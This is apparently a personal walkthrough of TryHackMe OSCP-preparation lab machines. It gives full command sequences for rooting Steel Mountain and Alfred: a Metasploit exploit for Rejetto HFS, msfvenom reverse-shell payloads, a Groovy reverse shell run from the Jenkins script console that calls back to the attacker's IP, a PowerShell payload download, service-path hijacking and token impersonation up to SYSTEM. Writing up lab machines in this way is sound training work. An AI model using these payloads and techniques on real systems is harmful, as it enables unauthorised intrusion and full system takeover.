Here I document the key steps to root machines on TryHackMe, focusing on the “OSCP Preparation” learning path that contains 18 machines. I will add detailed explanation whenever I have time.

Interesting Machines

A - Introduction

1. Kali Machine

Deploy and control your own Kali Linux machine directly from your browser.

2. OpenVPN

The OpenVPN room will guide you to connect to the network in order to access deployed machines.

B - Getting Started

3. Vulnersity

4. Blue

5. Kenobi

C - Proving It

6. Steel Mountain

@ http://10.10.141.130:8080/ -> HttpFileServer 2.3
- Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (https://www.exploit-db.com/exploits/39161)
MSF> use exploit/windows/http/rejetto_hfs_exec
MSF> set RHOSTS 10.10.141.130
MSF> set RPORT 443
MSF> exploit
meterpreter > cd "C:\Users\bill\Desktop"
meterpreter > upload /root/OSCP/PE/PowerUp.ps1
C:\Users\bill\Desktop> powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
-> Checking for unquoted service paths...
ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced 
                 SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; 
                 Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path 
                 <HijackPath>
CanRestart     : True
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.11.2.147 LPORT=443 -e x86/shikata_ga_nai -f exe -o Advanced.exe
meterpreter > cd "C:\Program Files (x86)\IObit"
meterpreter > upload /root/OSCP/Advanced.exe

C:\Program Files (x86)\IObit>sc stop AdvancedSystemCareService9
C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9

$ nc -lvnp 443 -> SYSTEM
==============================
- download winPEAS.exe (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/winPEAS/bin/Release/winPEAS.exe)
meterpreter > upload /root/OSCP/PE/winPEAS.exe
C:\Program Files (x86)\IObit>winPEAS.exe
[?] Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
    AdvancedSystemCareService9(IObit - Advanced SystemCare Service 9)[C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe] - Auto - Stopped - No quotes and Space detected

7. Alfred

@ http://10.10.16.248
@ http://10.10.16.248:8080/login?from=%2F (admin/admin)
- Manage Jenkins -> Script Console -> @ http://10.10.16.248:8080/script
(https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
String host="10.11.2.147";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.2.147 LPORT=443 -f exe -o alfred.exe
$ nc -lvnp 8044
- After getting user.txt, convert to MSF shell for PE (https://www.offensive-security.com/metasploit-unleashed/fun-incognito/)
C:\Program Files (x86)\Jenkins>powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.11.2.147/PE/alfred.exe','alfred.exe')"

MSF> use exploit/multi/handler
MSF> set PAYLOAD windows/meterpreter/reverse_tcp
MSF> set LHOST 10.11.2.147
MSF> set LPORT 443
MSF> exploit

C:\Program Files (x86)\Jenkins>alfred.exe
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -g
meterpreter > impersonate_token "BUILTIN\Administrators" 
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : ALFRED
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
- migrate from meterpreter x86 to x64
meterpreter > ps
1348  668   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
meterpreter > migrate 1348
[*] Migrating from 2156 to 1348...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
$ type "C:\Windows\System32\config\root.txt"